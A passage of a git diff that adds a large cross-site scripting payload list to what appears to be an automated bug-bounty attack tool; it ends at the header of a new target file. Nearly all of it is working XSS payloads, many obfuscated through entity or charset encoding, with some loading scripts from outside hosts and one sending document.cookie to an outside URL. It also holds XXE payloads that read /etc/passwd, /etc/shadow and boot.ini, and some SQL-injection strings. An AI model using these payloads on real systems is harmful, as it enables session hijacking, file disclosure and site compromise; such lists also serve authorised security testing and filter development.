SRC='vbscript:document.vulnerable=true;'> +1script3document.vulnerable=true;1/script3 +<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> +<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> +<IFRAME SRC="javascript:document.vulnerable=true;"></iframe> +<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> +<table BACKGROUND="javascript:document.vulnerable=true;"> +<table><TD BACKGROUND="javascript:document.vulnerable=true;"> +<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> +<div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> +<div STYLE="width: expression(document.vulnerable=true);"> +<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> +<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> +<XSS STYLE="xss:expression(document.vulnerable=true)"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> +<style TYPE="text/javascript">document.vulnerable=true;</style> +<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> +<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> +<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> +<base HREF="javascript:document.vulnerable=true;//"> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> +<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> +<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> +<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT 
DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> +<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> +<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> +<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- +<a href="javascript#document.vulnerable=true;"> +<div onmouseover="document.vulnerable=true;"> +<img src="javascript:document.vulnerable=true;"> +<img dynsrc="javascript:document.vulnerable=true;"> +<input type="image" dynsrc="javascript:document.vulnerable=true;"> +<bgsound src="javascript:document.vulnerable=true;"> +&<script>document.vulnerable=true;</script> +&{document.vulnerable=true;}; +<img src=&{document.vulnerable=true;};> +<link rel="stylesheet" href="javascript:document.vulnerable=true;"> +<iframe src="vbscript:document.vulnerable=true;"> +<img src="mocha:document.vulnerable=true;"> +<img src="livescript:document.vulnerable=true;"> +<a href="about:<script>document.vulnerable=true;</script>"> +<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> +<body onload="document.vulnerable=true;"> +<div style="background-image: url(javascript:document.vulnerable=true;);"> +<div style="behaviour: url([link to code]);"> +<div style="binding: url([link to code]);"> +<div style="width: expression(document.vulnerable=true;);"> +<style type="text/javascript">document.vulnerable=true;</style> +<object classid="clsid:..." 
codebase="javascript:document.vulnerable=true;"> +<style><!--</style><script>document.vulnerable=true;//--></script> +<<script>document.vulnerable=true;</script> +<![<!--]]<script>document.vulnerable=true;//--></script> +<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> +<img src="blah"onmouseover="document.vulnerable=true;"> +<img src="blah>" onmouseover="document.vulnerable=true;"> +<xml src="javascript:document.vulnerable=true;"> +<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> +<div datafld="b" dataformatas="html" datasrc="#X"></div> +[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> +<style>@import'http://www.securitycompass.com/xss.css';</style> +<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> +<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> +<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> +<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> +<script SRC="http://www.securitycompass.com/xss.jpg"></script> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> +<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> +<script =">" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> +<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> +<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> +<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] +&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt; 
+&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt; +&lt;/br style=a:expression(alert())&gt; +&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt; +&lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt; +perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out +perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS STYLE=xss:expression(alert('XSS'))> +"><script>alert('XSS')</script> +</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS STYLE=xss:e/**/xpression(alert('XSS'))> +</XSS STYLE=xss:expression(alert('XSS'))> +';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; +';';;!--";<;XSS>;=&;{()} +<;SCRIPT>;alert(';XSS';)<;/SCRIPT>; +<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; +<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; +<;BASE HREF=";javascript:alert(';XSS';);//";>; +<;BGSOUND SRC=";javascript:alert(';XSS';);";>; +<;BODY BACKGROUND=";javascript:alert(';XSS';);";>; +<;BODY ONLOAD=alert(';XSS';)>; +<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; +<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; +<;DIV STYLE=";width: expression(alert(';XSS';));";>; +<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; +<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; +<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; +<;IMG SRC=";javascript:alert(';XSS';);";>; +<;IMG SRC=javascript:alert(';XSS';)>; +<;IMG 
DYNSRC=";javascript:alert(';XSS';);";>; +<;IMG LOWSRC=";javascript:alert(';XSS';);";>; +<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; +Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser +exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); +<;STYLE>;li {list-style-image: url(";javascript:alert(&#39;XSS&#39;)";);}<;/STYLE>;<;UL>;<;LI>;XSS +<;IMG SRC=';vbscript:msgbox(";XSS";)';>; +<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; +<;IMG SRC=";livescript:[code]";>; +%BCscript%BEalert(%A2XSS%A2)%BC/script%BE +<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; +<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; +<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; +<;IMG SRC=";mocha:[code]";>; +<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; +<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; +<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; +a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&#10;eval(a+b+c+d); +<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; +<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; +<;XSS STYLE=";xss:expression(alert(';XSS';))";>; +<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; +<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; +<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; +<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; +<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; +<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; 
+<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; +<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; +<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; +<;HTML xmlns:xss>; +<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; +<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; +<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; +<;HTML>;<;BODY>; +<;!--[if gte IE 4]>; +<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; +<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; +<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; +<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; +<;? echo(';<;SCR)';; +<;BR SIZE=";&;{alert(';XSS';)}";>; +<;IMG SRC=JaVaScRiPt:alert(';XSS';)>; +<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; +<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; +<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; +<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; +<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; +<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; +<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; +<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; 
<;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- +\";;alert(';XSS';);// +<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; +<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; +<;IMG SRC=";jav&#x09;ascript:alert(';XSS';);";>; +<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; +<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; +<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; +<;IMG&#x0D;SRC&#x0D;=&#x0D;";&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;';&#x0D;X&#x0D;S&#x0D;S&#x0D;';&#x0D;)&#x0D;";&#x0D;>;&#x0D; +perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out +perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out +<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>; +<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; +<;SCRIPT SRC=http://ha.ckers.org/xss.js +<;SCRIPT SRC=//ha.ckers.org/.j>; +<;IMG SRC=";javascript:alert(';XSS';)"; +<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; +<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; +<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; +<;SCRIPT>;a=/XSS/ +<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; +<;A HREF=";http://66.102.7.147/";>;XSS<;/A>; +<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; +<;A HREF=";http://1113982867/";>;XSS<;/A>; +<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; +<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; 
+<;A HREF=";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; +<;A HREF=";//www.google.com/";>;XSS<;/A>; +<;A HREF=";//google";>;XSS<;/A>; +<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; +<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; +<;A HREF=";http://google.com/";>;XSS<;/A>; +<;A HREF=";http://www.google.com./";>;XSS<;/A>; +<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; +<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; +<script>document.vulnerable=true;</script> +<img SRC="jav ascript:document.vulnerable=true;"> +<img SRC="javascript:document.vulnerable=true;"> +<img SRC=" &#14; javascript:document.vulnerable=true;"> +<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> +<<SCRIPT>document.vulnerable=true;//<</SCRIPT> +<script <B>document.vulnerable=true;</script> +<img SRC="javascript:document.vulnerable=true;" +<iframe src="javascript:document.vulnerable=true; < +<script>a=/XSS/\ndocument.vulnerable=true;</script> +\";document.vulnerable=true;;// +</title><SCRIPT>document.vulnerable=true;</script> +<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> +<body BACKGROUND="javascript:document.vulnerable=true;"> +<body ONLOAD=document.vulnerable=true;> +<img DYNSRC="javascript:document.vulnerable=true;"> +<img LOWSRC="javascript:document.vulnerable=true;"> +<bgsound SRC="javascript:document.vulnerable=true;"> +<br SIZE="&{document.vulnerable=true}"> +<LAYER SRC="javascript:document.vulnerable=true;"></LAYER> +<link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> +<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS +<img SRC='vbscript:document.vulnerable=true;'> +1script3document.vulnerable=true;1/script3 +<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> +<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> +<IFRAME 
SRC="javascript:document.vulnerable=true;"></iframe> +<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> +<table BACKGROUND="javascript:document.vulnerable=true;"> +<table><TD BACKGROUND="javascript:document.vulnerable=true;"> +<div STYLE="background-image: url(javascript:document.vulnerable=true;)"> +<div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> +<div STYLE="width: expression(document.vulnerable=true);"> +<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> +<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> +<XSS STYLE="xss:expression(document.vulnerable=true)"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> +<style TYPE="text/javascript">document.vulnerable=true;</style> +<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> +<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> +<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> +<base HREF="javascript:document.vulnerable=true;//"> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> +<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> +<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> +<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> +<? 
echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> +<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> +<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- +<a href="javascript#document.vulnerable=true;"> +<div onmouseover="document.vulnerable=true;"> +<img src="javascript:document.vulnerable=true;"> +<img dynsrc="javascript:document.vulnerable=true;"> +<input type="image" dynsrc="javascript:document.vulnerable=true;"> +<bgsound src="javascript:document.vulnerable=true;"> +&<script>document.vulnerable=true;</script> +&{document.vulnerable=true;}; +<img src=&{document.vulnerable=true;};> +<link rel="stylesheet" href="javascript:document.vulnerable=true;"> +<iframe src="vbscript:document.vulnerable=true;"> +<img src="mocha:document.vulnerable=true;"> +<img src="livescript:document.vulnerable=true;"> +<a href="about:<script>document.vulnerable=true;</script>"> +<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> +<body onload="document.vulnerable=true;"> +<div style="background-image: url(javascript:document.vulnerable=true;);"> +<div style="behaviour: url([link to code]);"> +<div style="binding: url([link to code]);"> +<div style="width: expression(document.vulnerable=true;);"> +<style type="text/javascript">document.vulnerable=true;</style> +<object classid="clsid:..." 
codebase="javascript:document.vulnerable=true;"> +<style><!--</style><script>document.vulnerable=true;//--></script> +<<script>document.vulnerable=true;</script> +<![<!--]]<script>document.vulnerable=true;//--></script> +<!-- -- --><script>document.vulnerable=true;</script><!-- -- --> +<img src="blah"onmouseover="document.vulnerable=true;"> +<img src="blah>" onmouseover="document.vulnerable=true;"> +<xml src="javascript:document.vulnerable=true;"> +<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> +<div datafld="b" dataformatas="html" datasrc="#X"></div> +[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> +<style>@import'http://www.securitycompass.com/xss.css';</style> +<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> +<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> +<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> +<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> +<script SRC="http://www.securitycompass.com/xss.jpg"></script> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> +<script a=">" SRC="http://www.securitycompass.com/xss.js"></script> +<script =">" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> +<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> +<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> +<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> +<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> +<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] +";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; 
+<;/script>;<;script>;alert(1)<;/script>; +<;/br style=a:expression(alert())>; +<;scrscriptipt>;alert(1)<;/scrscriptipt>; +<;br size=\";&;{alert(&#039;XSS&#039;)}\";>; +perl -e &#039;print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;&#039; >; out +perl -e &#039;print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;&#039; >; out +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> +<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +<~/XSS STYLE=xss:expression(alert('XSS'))> +"><script>alert('XSS')</script> +</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> +XSS STYLE=xss:e/**/xpression(alert('XSS'))> +</XSS STYLE=xss:expression(alert('XSS'))> +>"><script>alert("XSS")</script>& +"><STYLE>@import"javascript:alert('XSS')";</STYLE> +>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> +>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> +'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' +'';!--"<XSS>=&{()} +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)> +<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41> +<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041> +<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"> +<IMG 
SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"> +<![CDATA[<script>var n=0;while(true){n++;}</script>]]> +<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> +<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> +<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> +<script>alert('XSS')</script> +%3cscript%3ealert('XSS')%3c/script%3e +%22%3e%3cscript%3ealert('XSS')%3c/script%3e +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=javascript:alert('XSS')> +<img src=xss onerror=alert(1)> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<BODY BACKGROUND="javascript:alert('XSS')"> +<BODY ONLOAD=alert('XSS')> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<IMG SRC="javascript:alert('XSS')" +<iframe 
src=http://ha.ckers.org/scriptlet.html < +<<SCRIPT>alert("XSS");//<</SCRIPT> +%253cscript%253ealert(1)%253c/script%253e +"><s"%2b"cript>alert(document.cookie)</script> +foo<script>alert(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt> +<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<marquee onstart='javascript:alert('1');'>=(◕_◕)= \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/target.txt b/bounty_drive/attacks/xss/payloads/target.txt new file mode 100644 index 0000000..24bed2c --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/target.txt 
